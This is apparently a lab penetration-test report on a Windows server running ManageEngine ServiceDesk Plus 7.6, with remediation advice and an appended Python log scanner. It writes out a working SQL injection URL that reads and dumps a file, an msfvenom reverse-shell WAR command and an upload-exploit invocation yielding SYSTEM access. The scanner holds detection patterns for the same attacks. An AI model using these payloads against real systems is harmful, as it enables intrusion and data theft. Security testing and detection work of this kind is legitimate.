Pentest report on Helpdesk

Executive Summary

Helpdesk is a Windows 2008 Standard server hosting the ManageEngine ServiceDesk Plus (SDP) 7.6 web application. This version of SDP suffers from multiple vulnerabilities; of these, we used two exploits.

  • SQL injection – we were able to read proof.txt from C:\Users\Administrator\Desktop\
  • Arbitrary file upload – we uploaded a malicious Java WAR file containing a reverse shell to gain access and obtained administrative privileges on Helpdesk.

Both of the above exploits were achieved with just a guest account.

Recommendation

It is recommended to patch ManageEngine ServiceDesk Plus to the latest version and to disable the guest account if it is not needed. If the guest account is needed, check with ManageEngine whether changing its username and password is viable.

Service Enumeration

TCP port   Description
135        MS RPC
139        netbios-ssn
445        MS SMB
3389       Remote Desktop
8080       ManageEngine ServiceDesk

Vulnerability exploited

SQL injection

To perform the exploits we first log on to ManageEngine SDP as guest; the account name and the password are the same.

Screenshots: logging on as guest, and the guest account interface.

The original PoC can be referenced at: https://www.exploit-db.com/exploits/11793

This is the modified PoC:

http://192.168.x.43:8080/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=6)union select 1,2,3,4,5,6,7,":",load_file("c:\\users\\administrator\\desktop\\proof.txt"),":",11,12,13,14,15,16,17,18,19,1 into dumpfile 'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\loot.txt'/*

The PoC abuses a MySQL query to write the query result into a file – loot.txt: the query uses the load_file function to read proof.txt and saves its contents to loot.txt.

To view the content, navigate to http://192.168.x.43:8080/images/loot.txt; the content is in the middle section, separated by colons.

SQL injection is possible because the woID parameter is not properly sanitized before it is placed into the query.

Arbitrary File upload

The vulnerability is documented in CVE-2014-5301. A directory traversal vulnerability is exploited to upload any file the attacker wishes.

The directory traversal can reach the JBoss deploy path (../../server/default/deploy), which directly deploys and executes Java WAR files: a POST request is made to /common/FileAttachment.jsp, the WAR file is written to the JBoss deploy path, and it is executed.

An automated Python script is available to exploit this vulnerability: https://raw.githubusercontent.com/PeterSufliarsky/exploits/master/CVE-2014-5301.py

First, generate a malicious Java WAR file with msfvenom:

msfvenom -p java/shell/reverse_tcp lhost=192.168.x.x lport=8080 -f war -o shell.war

This WAR file will send a connection to a multi handler server which I set up.

Screenshot: multi handler server waiting to receive the staging connection.

Then run the Python script to upload shell.war to Helpdesk.

./CVE-2014-5301.py 192.168.x.43 8080 guest guest shell.war
Screenshots: executing the Python script; the reverse connection is established.

ManageEngine SDP was started with administrative rights (NT AUTHORITY\SYSTEM), hence I can easily navigate to C:\Users\Administrator\Desktop\proof.txt.
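As an added example (not part of the original report), the following Python scans web-server access-log lines for the two request patterns described above: a WorkOrder.do request whose query string carries UNION SELECT, load_file or INTO DUMPFILE, and a POST to /common/FileAttachment.jsp whose query contains a path-traversal sequence. The log lines are constructed, and the "filename" parameter in the upload request is a placeholder, not SDP's real parameter name.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Combined Log Format; not real traffic.
# "filename=" is a placeholder parameter, not the one SDP actually uses.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /WorkOrder.do?woMode=viewWO&woID=6 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Oct/2020:13:56:01 +0000] "GET /WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID%3D6)union%20select%201,load_file(%22c:%5C%5Cproof.txt%22)%20into%20dumpfile%20%27C:%5C%5Cloot.txt%27/* HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Oct/2020:13:58:44 +0000] "POST /common/FileAttachment.jsp?filename=..%2F..%2Fserver%2Fdefault%2Fdeploy%2Fshell.war HTTP/1.1" 200 310',
    '10.0.0.7 - - [10/Oct/2020:14:01:10 +0000] "POST /common/FileAttachment.jsp?filename=invoice.pdf HTTP/1.1" 200 310',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SQLI_MARKERS = (
    re.compile(r'union\s+(all\s+)?select', re.I),
    re.compile(r'load_file\s*\(', re.I),
    re.compile(r'into\s+(dumpfile|outfile)\b', re.I),
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')

def _decode(s, rounds=3):
    """URL-decode repeatedly so double-encoded (%252e) sequences cannot hide markers."""
    for _ in range(rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s

def classify(line):
    """Return (ip, rule_name) for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = _decode(m.group('target')).partition('?')
    if path.endswith('/WorkOrder.do') and any(p.search(query) for p in SQLI_MARKERS):
        return (m.group('ip'), 'sdp_workorder_sqli')
    if (path.endswith('/common/FileAttachment.jsp') and m.group('method') == 'POST'
            and TRAVERSAL_RE.search(query)):
        return (m.group('ip'), 'sdp_attachment_traversal')
    return None

def scan(lines):
    """Run classify() over every line and keep only the hits, in log order."""
    return [hit for hit in (classify(l) for l in lines) if hit]

if __name__ == '__main__':
    for ip, rule in scan(SAMPLE_LOG):
        print(f'{ip}\t{rule}')
```

Detection on the request line alone is a starting point; the upload rule should also be paired with file-integrity monitoring on the JBoss deploy directory, since a successful write there is the decisive signal.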

Screenshots: obtaining proof.txt.
